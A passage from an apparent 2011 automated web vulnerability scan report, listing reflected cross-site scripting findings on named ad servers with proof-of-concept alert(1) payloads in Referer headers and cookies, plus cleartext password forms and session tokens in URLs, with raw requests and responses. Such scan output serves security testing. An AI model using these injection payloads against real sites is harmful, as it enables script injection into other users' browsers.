The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4c31'-alert(1)-'1769fa3b869 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e4c31'-alert(1)-'1769fa3b869
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:32 GMT
Content-Length: 474

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.google.com/search%3Fhl=en%26q=e4c31'-alert(1)-'1769fa3b869&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3
...[SNIP]...

2.144. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfb25"-alert(1)-"75ee6a13843 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.6579760571476072 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311bfb25"-alert(1)-"75ee6a13843; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; FFcat=305,7040,15:305,7038,15; FFad=0:0; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1c4ea';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,9:1545,8,9:826,622,14:1545,8,14:1545,8,0:0,8,14:1545,0,14:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=38:36:27:25:3:1:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236:1545,219513,220546,220547,219514,221452,228586,235518,221451|2,1#0,24:2,1#0,24:4,1#0,24:5,1#0,24:5,1#0,24:4,1#0,24:4,1#0,24:0,1#0,24:0,1#0,24:4,1#0,24;expires=Wed, 12 Oct 2011 12:49:06 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:49:06 GMT
Content-Length: 2740
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1c4ea'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=1c4ea';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311bfb25"-alert(1)-"75ee6a13843';

var zzhasAd=undefined;


                                                                    var
...[SNIP]...

2.145. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c61c"-alert(1)-"72963d88d75 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~0903113c61c"-alert(1)-"72963d88d75; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 448
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:f095e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=16:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='f095e'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=f095e';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~0903113c61c"-alert(1)-"72963d88d75';

var zzhasAd=undefined;


               

3. Cleartext submission of password
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.digitaldollhouse.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<div id="login"><form action="/homeone?destination=homeone" accept-charset="UTF-8" method="post" id="newhome-login">
<div>
...[SNIP]...
<div class="form-item" id="newhome-login-pass-wrapper">
<input type="password" name="pass" id="newhome-login-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

3.2. http://www.digitaldollhouse.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
</div>
<form action="/" accept-charset="UTF-8" method="post" id="newhome-register" onsubmit="pageTracker._trackPageview(&#039;/virtual/register&#039;);">
<div>
...[SNIP]...
</label>
<input type="password" name="pass[pass1]" id="edit-pass-pass1" maxlength="128" size="25" class="form-text required password-field" />
</div>
...[SNIP]...
</label>
<input type="password" name="pass[pass2]" id="edit-pass-pass2" maxlength="128" size="25" class="form-text required password-confirm" />
</div>
...[SNIP]...

3.3. http://www.fastcompany.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
</div><form action="/" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-regPass-wrapper">
<input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

3.4. http://www.fastcompany.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<div id="left_forms"><form action="/home?destination=home" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-pass-wrapper">
<input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" />
</div>
...[SNIP]...

3.5. http://www.nowpublic.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nowpublic.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.nowpublic.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:18 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n54.panthercdn.com
ETag: "f79c8d21f3918aedd34f5c0ed9e4fcae"
Cache-Control: max-age=360
Expires: Mon, 12 Sep 2011 12:54:12 GMT
Age: 6
Content-Length: 74898
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Mon, 12 Sep 2011 12:28:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="wrapper-body">
<form method="post" action="http://my.nowpublic.com/user/login">
<div id="login-name-wrapper" class="form-item">
...[SNIP]...
</label>
<input type="password" name="pass" id="login-pass" maxlength="128" size="30" class="form-text" />
</div>
...[SNIP]...

4. Session token in URL
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

4.2. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=wp.12086c39-fe96-4496-b817-e62244e98b59&hostname=www.dome9.com&location=%2F&url=http%3A%2F%2Fwww.dome9.com%2F&sessionID=1315849264587.66546&fpc=35aae75-1325eba5dcc-1493d30f-1&ts1315849265708.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.dome9.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:40:55 GMT
Connection: keep-alive


4.3. http://video.fastcompany.com/manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://video.fastcompany.com
Path:   /manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt?voxtoken=system&autoplay=false&config=%7BconfigInject%3A'true'%7D&embed_location=http%3A%2F%2Fwww.fastcompany.com%2F&feed=http%3A%2F%2Fvideo.fastcompany.com%2Fcompanies%2Fmansueto-digital%2Fvideos.rss%3Fids%3D35a3467f31b51%2C5a74966232a47%2C1bc51eb069eb1%2C29b58b01bf488%2C79b00a7ba65dd%2C273bd40607339%26append_image_to_description%3Dfalse%26verbosity%3Dlow&height=180&p=fc_playlist_homepage&width=320 HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:07 GMT
Server: VoxCAST
Last-Modified: Sat, 10 Sep 2011 12:55:27 GMT
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Mon, 12 Sep 2011 12:49:20 GMT
X-Cache: HIT from VoxCAST
Content-Length: 4383
Age: 3528
Content-Type: text/plain

/plugins/flowplayer.swf?config=%7B%22plugins%22%3A%7B%22bwcheck%22%3A%7B%22url%22%3A%22flowplayer.bwcheck.swf%22%2C%22serverType%22%3A%22fms%22%2C%22netConnectionUrl%22%3A%22rtmp%3A%2F%2Ffms.0367.edge
...[SNIP]...

4.4. http://video.fastcompany.com/plugins/flowplayer.swf

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://video.fastcompany.com
Path:   /plugins/flowplayer.swf

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/flowplayer.swf?voxtoken=system&embed_domain=www.fastcompany.com HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1603584230-1315849705375

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:09 GMT
Server: VoxCAST
Last-Modified: Thu, 25 Aug 2011 01:47:01 GMT
Cache-Control: max-age=3600
Expires: Mon, 12 Sep 2011 13:47:36 GMT
Accept-Ranges: bytes
Content-Length: 123292
Age: 33
X-Cache: HIT from VoxCAST
Content-Type: application/x-shockwave-flash

CWS
...[SNIP]...

4.5. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=127445909615&app_id=127445909615&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd667bad4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36fd7b1e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f5002a3%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33dd7c2b4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df146f8bdf4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.174.125
X-Cnection: close
Date: Mon, 12 Sep 2011 12:47:56 GMT
Content-Length: 245

